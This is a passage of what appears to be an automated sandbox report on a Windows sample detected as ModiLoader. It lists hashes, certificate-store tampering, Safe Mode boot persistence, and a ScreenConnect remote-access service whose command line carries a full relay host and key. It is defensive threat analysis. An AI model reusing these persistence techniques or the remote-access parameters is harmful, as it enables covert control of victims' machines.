Analysis
-
max time kernel
120s -
max time network
119s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
06-11-2024 12:10
Static task
static1
Behavioral task
behavioral1
Sample
e310f5244b75c39aca5c52daf037e4fc419ca8420776807ea31042136bc45583N.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
e310f5244b75c39aca5c52daf037e4fc419ca8420776807ea31042136bc45583N.exe
Resource
win10v2004-20241007-en
General
-
Target
e310f5244b75c39aca5c52daf037e4fc419ca8420776807ea31042136bc45583N.exe
-
Size
81KB
-
MD5
5cdddf48635f02655a068997d796f5e0
-
SHA1
08936eb88b1c568459869f2f5095e26011ed4080
-
SHA256
e310f5244b75c39aca5c52daf037e4fc419ca8420776807ea31042136bc45583
-
SHA512
454f67c642ee2f820693d2f8db588966fda779135cd61ae8c4c5e17bc36544bfd38189eda2032dc62a87c64d2fc3351a198fa1da8ad451687f35979619e2a22d
-
SSDEEP
1536:IoG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdapPBJYY37i:oenkyfPAwiMq0RqRfbapZJYY3
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Modiloader family
-
Detected Nirsoft tools 1 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
Processes:
resource yara_rule behavioral2/files/0x0009000000023d2b-493.dat Nirsoft -
ModiLoader First Stage 2 IoCs
Processes:
resource yara_rule behavioral2/memory/116-595-0x0000000000400000-0x00000000007B1000-memory.dmp modiloader_stage1 behavioral2/memory/60-613-0x0000000000400000-0x00000000007B1000-memory.dmp modiloader_stage1 -
Creates new service(s) 2 TTPs
-
Drops file in Drivers directory 1 IoCs
Processes:
Lock PC.tmpdescription ioc Process File created C:\Windows\system32\drivers\is-NTSFU.tmp Lock PC.tmp -
Manipulates Digital Signatures 1 TTPs 3 IoCs
Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.
Processes:
e310f5244b75c39aca5c52daf037e4fc419ca8420776807ea31042136bc45583N.exedescription ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c2000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e e310f5244b75c39aca5c52daf037e4fc419ca8420776807ea31042136bc45583N.exe Set value (data) \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 0300000001000000140000004c2272fba7a7380f55e2a424e9e624aee1c145792000000001000000640700003082076030820548a00302010202100b9360051bccf66642998998d5ba97ce300d06092a864886f70d01010b05003069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e67205253413430393620534841333834203230323120434131301e170d3232303831373030303030305a170d3235303831353233353935395a3065310b30090603550406130255533110300e06035504081307466c6f72696461310e300c0603550407130554616d706131193017060355040a1310436f6e6e656374776973652c204c4c433119301706035504031310436f6e6e656374776973652c204c4c4330820222300d06092a864886f70d01010105000382020f003082020a0282020100ec489826d08d2c6de21b3cd3676db1e0e50cb1ff75ff564e9741f9574aa3640aa8297294a05b4db68abd0760b6b05b50ce92ff42a4e390be776a43e9961c722f6b3a4d5c880bcc6a61b4026f9137d36b2b7e9b86055876b9fa860dbcb164fe7f4b5b9de4799ae4e02dc1f0bee01e5d032933a2827388f8db0b482e76c441b1bd50909ef2023e1fb62196c994ce052266b28cd89253e6416044133139764db5fc45702529536bf82c775f9ec81fa27dc409530325f40cdef95b81b9ce0d42791cee72e7bd1b36c257b52257c65a28970e457513989434bfc239e2992b193e1b3cc3f11ccdd1d26d4ec9845099ab913906a42069af999c0071169b45a2ea1aa666f1904e8acb05e1823a359a291fd46b4ef7aed5935bb6ab17ebf077210726930c90f01761d6544a94e8fa614cc41d817eec734b1c3d3afb7c58fb256f0c09edc1459bddbff9940ed1958570265d67af79a9b6a16affd70fc6328c9810d5dc186e39af6fbcad49a270f237e6bcd5de0bc014bc3179cd79776591340311a42ca94f33416c2e01b59bd1d71de86ace6716bc90b2d7695d155039aa08fbac19a4d93fb784230a20a485287a16355645fc09142c602d140fa046b7bfd75328184ff7bdf8f9e0d65e6201c8d242931047f59bd328ac353777ccefa60408887b84fc3631301463461a1d73c0b5cc74d6d82905ddf923bdbab027a311cc38d3fa16f639a50203010001a382020630820202301f0603551d230418301680146837e0ebb63bf85f1186fbfe617b088865f44e42301d0603551d0e04160414338ce10a6e06d9c6ed0bc6cae736cefb8188646a300e0603551d0f0101ff04040302078030130603551d25040c300a06082b060105050703033081b50603551d1f0481ad3081aa3053a051a04f864d687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c3053a051a04f864d687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c303e0603551d20043730353033060667810c0104013029302706082b06010505070201161b687474703a2f2f7777772e64696769636572742e636f6d2f43505330819406082b06010505070101048187308184302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d305c06082b060105050730028650687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820201000ad79f00cf4984864c8981ecce8718aa875647f6a74608c968e16568c7aa9d711ed7341676038067f01330c91621b27a2a8894c4108c268162a31f13f9757a7d6bb3c6f19bf27c3a29896d712d85873627d827cd6471761444fabf1d31e903f791143c5b4ce5e7444aacba36d759aeba3069d195226755cbc675aa747f77596c53c96e083c45bba24479d6845eea9f2b28ba29b4dcf0bcf14aa4ce176c24e2c1b8fec3ee16e1c086db6fda97388859e83be65c03f701395b78b842c6dd1533ef642cca6fe50f6337d3f2dfedd8b28f2b28e0c98edd2151392e7cc75489f48859f1de14c81b306eb50eed7bb78be30eaada76767c4ca523a11eec5a2372d6122926ab1801a6a6778e9504791487ee47d4577154988802070f80fc535957658f954cd083546c5afb5a6567b6761275f5db20f70ab86feef94c7cfc65369d325121b69a82399bc7dc1962416f0f05cf1eee64d495a3527e464e2c68da0187093f97b673e43dddbcc067e00713f1565fcff8c3772d44b40a04e600644f22a990345f9a6b5b52963e82c81a0ce91d43a230f67b37d8debda40ea3d59d305e18adc1976516c12a8ba2bca24143b12e9527b4dca58872aa9b3a8c6ac563fc2dc02bf51be889516d35a4ba9d062417b5bdcc50ba945fae26b60d6aec03984798a6a21d3ff793cc0849e81ed55b8027411c50db776ae8feef2fdc2dafb04345261dedc054 e310f5244b75c39aca5c52daf037e4fc419ca8420776807ea31042136bc45583N.exe Key deleted \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C e310f5244b75c39aca5c52daf037e4fc419ca8420776807ea31042136bc45583N.exe -
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
ScreenConnect.ClientService.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (7b36425d-af20-46aa-a923-9f133d7391bc)\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\Apps\\2.0\\P055GB4G.CDR\\88OO79PM.J98\\scre..tion_25b0fbb6ef7eb094_0018.0003_27daf6644b7440f4\\ScreenConnect.ClientService.exe\" \"?e=Support&y=Guest&h=instance-l7g4dh-relay.screenconnect.com&p=443&s=7b36425d-af20-46aa-a923-9f133d7391bc&k=BgIAAACkAABSU0ExAAgAAAEAAQDVP1a20vKqeqe1KQFemomLm8erwhLpJp1KQnVFAxXxR%2fAz3hz0vYkeQulpCwRe9iWW0dRuBiCd4QvTjxbScJC8nEMvMHnm4MPjY73L4nGpV97oo264zQQyspkhXqNGR2iSOY6rpzvLKPopO9fWOecUGy8yJBQwR0HDB%2bV%2bDADDDeUKlr%2f%2bImJA6eJFZoh3jSThaEua7aIpOZ4Is8GgHX8wrKM81nNiWScf%2b7MB7KKIDRJByiihgKgCgnWSCJjLVCupmRFoab8THk%2fLIjFCP2pmaJw8v7WwUOPs029lZKG3850zwZwC0SO4vLP6yZA1QFVZK7Jr%2fnahgqnKFENgMAm3&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAnoPzfbU0UESngtSsivoO5gAAAAACAAAAAAAQZgAAAAEAACAAAAAvr%2foO0X8srKzCNPNLK0gTPt31ePLLbCMgJbodYjDB6wAAAAAOgAAAAAIAACAAAABDMRBTP5ZRGe3MjkQC0uds1%2f5CpAOR8GfQtf8oU%2fAscqAEAAAKXaTGIbTj1JZ%2bh8%2bPyb43sq5FRi6WgNlHQIOHpvkVp%2f0zHA0gMkSpYFVdsTWWu2BSxbdawWSCSFVeWmX1bCjKHq%2bYt%2b%2bIyz%2bKGV9UPY3ijygqpVLkRB2jZX6syuMlFgz0X2Pj1L3G2vzep3%2f8d2BjPp%2bcKIQ%2bDFe4A11V5zSb%2fbq667UllmUvxZdwelJnp5JuTuwC8GYXXfiW612xRSQYghWdJZJ1l8jA%2f3%2fjvvHjq2jpYnJn%2flUhBpsHgerhgGxcVnPyOR0PF4AWuC8jmlTnptnjl%2b4wT9nFDEtAURPhX1lyCw7TAgKH9XpSQpOdOE2lgaPAtg%2ba8sACMwIclr1Qa%2fyXlmlb9Xd%2f0E1QST5Hy6ULEH%2f%2b1EF1EJz4vvgF%2f1zhFJ86VPCGWVRYw0%2fWCmjh9NgWbjlUokxzFPO3msCAbKHWFN%2fMQR64cnqN78Mi0JuAfjM1IFzI8Xsjw7IohhkGqyUZtJUTSfhXvlTzjxYHobvv5mGQ3JnQwDV1taILeAfkyYuIfsKsz1JOw6l30IMvVE7XpYXkXDGxrEPf4AuMs9NjjxATOn4nHhYpLLzeC8kyDG%2fl92XkXhEAFvBfzYz3kqq4oIXkSI72ic9dbuV%2bfExSZ%2b0S01PFttqA0T953k5giPmXrHGrKeiGpJfjOzisLma5jE%2bSZEz0g4KxPq79dmPDdr7Q5fIPWHicbiYOD319RIA902Zm4v7DPa4NHp%2ft21HgAQVquVXJYuUeH0ZZDs6tlmqDm7C17muOczaBnMJwEFS%2fgp56wKsA6DrLYp%2fOtKJ5kdAb5%2bZFeijzeBWXaSG%2fT0fbspNXdkT0H%2beP%2b2UtnrAZQ8RgxbS%2bDyZQ2kpf1IUq1xIx6%2fCDntR%2fprjHvsXeiaY3i5OetHXJonMXqkBXAZj8HQMsoXI4ucOrWgHdQP2PTw8%2bDcVlzRSskQ6U3CJ7HqiicC%2fhJGD8j2GxLaDwUUe5uf9VNl9zpOhdIvS2155bHwlMLYOzfjZf27iTHE7C71M8IjwAY0iucWPQD%2fO9y2CmqVhqCnIUCSwNjOLdajzyxnMU0og5ttLbC6naKwq9QXvSGXcRJh7Gix6exutr4NshLoWgcDuRLnCRRbksrE0rk6uLhKiJy3J1b%2bJPa2icR%2bl%2bdoVb9BtDChU8ns%2f3KQhq3YSe6Qp%2bgj%2fbf2f7PHMs2PATlm0Fm832ip7d4B4yduLeMoFRfyuQVt3lS%2bgNQQrsVXVbNUSe42YoreH5FZYdfmm4gutY8wUVzgmocGptbXswjLbPsfq7cM1hS0CZoW%2fUX8L4ruXJsGeRfeNs0Rr%2bPd03qpklcuvFuycBZL16gugkdT%2fAs0FsCoLnngWjvw85qqYNYfNwYw%2bGAseTjfyyplnQ%2fUhQwjwSeUxYck37s5wmrxR7VdCDWkHraMtFfPAg9QR3LB%2fFEAas%2baLfLSlDGzkF9SB02Y0IuCb0N8fDm4bJvnp%2f%2fP1hfJaOm8RHjQwoI7MBo%2fDksFHiqCjQZ%2fOnBkPzLMW5sck85YlJaEPVfSv8BEyqLH4tRHJy%2bdAwiK%2bPtvqbbgxbvjprRP44Xdl%2fibu8i7lj0spp4F35RUAAAABvO8zAv1tUD9TzJITlmOmwvM3nNl%2bjKKQZlm06GpA5mZmjvsuoZMEAe6fa3gxbyDWCiWBAlrY5T8qBuJcmH0Hu&r=&i=ATTest%20261024%2053\" \"1\"" ScreenConnect.ClientService.exe -
Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
Processes:
Lock PC.tmpdescription ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\LmpcService Lock PC.tmp Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\LmpcService\ = "Service" Lock PC.tmp -
Downloads MZ/PE file
-
Drops desktop.ini file(s) 1 IoCs
Processes:
ScreenConnect.WindowsFileManager.exedescription ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini ScreenConnect.WindowsFileManager.exe -
Enumerates connected drives 3 TTPs 7 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
ScreenConnect.WindowsBackstageShell.exeScreenConnect.WindowsClient.exeScreenConnect.WindowsFileManager.exeScreenConnect.WindowsFileManager.exedescription ioc Process File opened (read-only) \??\D: ScreenConnect.WindowsBackstageShell.exe File opened (read-only) \??\D: ScreenConnect.WindowsClient.exe File opened (read-only) \??\F: ScreenConnect.WindowsClient.exe File opened (read-only) \??\D: ScreenConnect.WindowsFileManager.exe File opened (read-only) \??\F: ScreenConnect.WindowsFileManager.exe File opened (read-only) \??\D: ScreenConnect.WindowsFileManager.exe File opened (read-only) \??\F: ScreenConnect.WindowsFileManager.exe -
Drops file in System32 directory 61 IoCs
Processes:
ScreenConnect.WindowsFileManager.exeScreenConnect.WindowsFileManager.exeScreenConnect.WindowsBackstageShell.exeScreenConnect.WindowsClient.exeLock PC.tmpScreenConnect.WindowsClient.exeScreenConnect.WindowsClient.exedescription ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db ScreenConnect.WindowsFileManager.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db ScreenConnect.WindowsFileManager.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db ScreenConnect.WindowsFileManager.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db ScreenConnect.WindowsBackstageShell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db ScreenConnect.WindowsBackstageShell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db ScreenConnect.WindowsBackstageShell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db ScreenConnect.WindowsClient.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db ScreenConnect.WindowsFileManager.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db ScreenConnect.WindowsFileManager.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db ScreenConnect.WindowsBackstageShell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db ScreenConnect.WindowsBackstageShell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\thumbcache_wide.db ScreenConnect.WindowsClient.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Lock My PC 4\Lock My PC.lnk Lock PC.tmp File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db ScreenConnect.WindowsBackstageShell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db ScreenConnect.WindowsClient.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db ScreenConnect.WindowsClient.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\thumbcache_wide_alternate.db ScreenConnect.WindowsClient.exe File opened for modification C:\Windows\system32\user.config ScreenConnect.WindowsClient.exe File opened for modification C:\Windows\system32\config\systemprofile\Favorites\desktop.ini ScreenConnect.WindowsFileManager.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini Lock PC.tmp File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db ScreenConnect.WindowsFileManager.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1280.db ScreenConnect.WindowsClient.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu Lock PC.tmp File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs Lock PC.tmp File created C:\Windows\system32\is-2V47L.tmp Lock PC.tmp File created C:\Windows\system32\user.config ScreenConnect.WindowsClient.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db ScreenConnect.WindowsBackstageShell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db ScreenConnect.WindowsBackstageShell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db ScreenConnect.WindowsClient.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\thumbcache_768.db ScreenConnect.WindowsClient.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1920.db ScreenConnect.WindowsClient.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Lock My PC 4\Uninstall Lock My PC.lnk Lock PC.tmp File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db ScreenConnect.WindowsBackstageShell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db ScreenConnect.WindowsClient.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db ScreenConnect.WindowsFileManager.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\thumbcache_custom_stream.db ScreenConnect.WindowsClient.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Lock My PC 4\Lock My PC Help.lnk Lock PC.tmp File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db ScreenConnect.WindowsFileManager.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db ScreenConnect.WindowsBackstageShell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db ScreenConnect.WindowsBackstageShell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db ScreenConnect.WindowsClient.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db ScreenConnect.WindowsClient.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db ScreenConnect.WindowsBackstageShell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db ScreenConnect.WindowsBackstageShell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Lock My PC 4\FSPro Labs in Web ....lnk Lock PC.tmp File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db ScreenConnect.WindowsClient.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log ScreenConnect.WindowsClient.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db ScreenConnect.WindowsClient.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db ScreenConnect.WindowsClient.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Lock PC.tmp File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db ScreenConnect.WindowsClient.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Lock My PC 4\Lock My PC Settings.lnk Lock PC.tmp File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db ScreenConnect.WindowsBackstageShell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db ScreenConnect.WindowsBackstageShell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\thumbcache_exif.db ScreenConnect.WindowsClient.exe File opened for modification C:\Windows\system32\fsp_lmwl.dll Lock PC.tmp File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\thumbcache_2560.db ScreenConnect.WindowsClient.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db ScreenConnect.WindowsFileManager.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db ScreenConnect.WindowsFileManager.exe File opened for modification C:\Windows\system32\config\systemprofile\Favorites ScreenConnect.WindowsFileManager.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db ScreenConnect.WindowsClient.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in Program Files directory 36 IoCs
Processes:
Lock PC.tmpScreenConnect.WindowsFileManager.exedescription ioc Process File created C:\Program Files\Lock My PC 4\is-UV70E.tmp Lock PC.tmp File created C:\Program Files\Lock My PC 4\is-9809V.tmp Lock PC.tmp File created C:\Program Files\Lock My PC 4\is-EGFEV.tmp Lock PC.tmp File created C:\Program Files\Lock My PC 4\LockScreens\is-PDMOF.tmp Lock PC.tmp File opened for modification C:\Program Files\Lock My PC 4\LmpcServ.exe Lock PC.tmp File opened for modification C:\Program Files\Lock My PC 4\LockLib.dll Lock PC.tmp File created C:\Program Files\Lock My PC 4\is-3VS6A.tmp Lock PC.tmp File created C:\Program Files\Lock My PC 4\is-3DRE3.tmp Lock PC.tmp File created C:\Program Files\Lock My PC 4\LockScreens\lockscreen1.bmp ScreenConnect.WindowsFileManager.exe File created C:\Program Files\Lock My PC 4\LockScreens\lockscreen5_b.gif ScreenConnect.WindowsFileManager.exe File created C:\Program Files\Lock My PC 4\LockScreens\lockscreen6_r.gif ScreenConnect.WindowsFileManager.exe File created C:\Program Files\Lock My PC 4\LockScreens\lockscreen2.bmp ScreenConnect.WindowsFileManager.exe File created C:\Program Files\Lock My PC 4\unins000.dat Lock PC.tmp File opened for modification C:\Program Files\Lock My PC 4\LockScreens\lockscreen6_r.gif ScreenConnect.WindowsFileManager.exe File opened for modification C:\Program Files\Lock My PC 4\LockScreens\lockscreen2.bmp ScreenConnect.WindowsFileManager.exe File opened for modification C:\Program Files\Lock My PC 4\lockmypc.chm Lock PC.tmp File created C:\Program Files\Lock My PC 4\LockScreens\is-CE1NV.tmp Lock PC.tmp File opened for modification C:\Program Files\Lock My PC 4\LockScreens\lockscreen5_b.gif ScreenConnect.WindowsFileManager.exe File created C:\Program Files\Lock My PC 4\LockScreens\is-TPRUS.tmp Lock PC.tmp File created C:\Program Files\Lock My PC 4\LockScreens\is-3KIPQ.tmp Lock PC.tmp File created C:\Program Files\Lock My PC 4\LockScreens\is-BBKKR.tmp Lock PC.tmp File opened for modification C:\Program Files\Lock My PC 4\lockpc.exe Lock PC.tmp File created C:\Program Files\Lock My PC 4\is-TS9FA.tmp Lock PC.tmp File created C:\Program Files\Lock My PC 4\is-N0S9J.tmp Lock PC.tmp File created C:\Program Files\Lock My PC 4\unins000.msg Lock PC.tmp File opened for modification C:\Program Files\Lock My PC 4\unins000.dat Lock PC.tmp File opened for modification C:\Program Files\Lock My PC 4\LockScreens\lockscreen1.bmp ScreenConnect.WindowsFileManager.exe File created C:\Program Files\Lock My PC 4\LockScreens\lockscreen3.bmp ScreenConnect.WindowsFileManager.exe File opened for modification C:\Program Files\Lock My PC 4\lockcp.exe Lock PC.tmp File created C:\Program Files\Lock My PC 4\is-M466G.tmp Lock PC.tmp File created C:\Program Files\Lock My PC 4\LockScreens\is-DTC74.tmp Lock PC.tmp File created C:\Program Files\Lock My PC 4\LockScreens\lockscreen4.bmp ScreenConnect.WindowsFileManager.exe File opened for modification C:\Program Files\Lock My PC 4\LockScreens\lockscreen4.bmp ScreenConnect.WindowsFileManager.exe File created C:\Program Files\Lock My 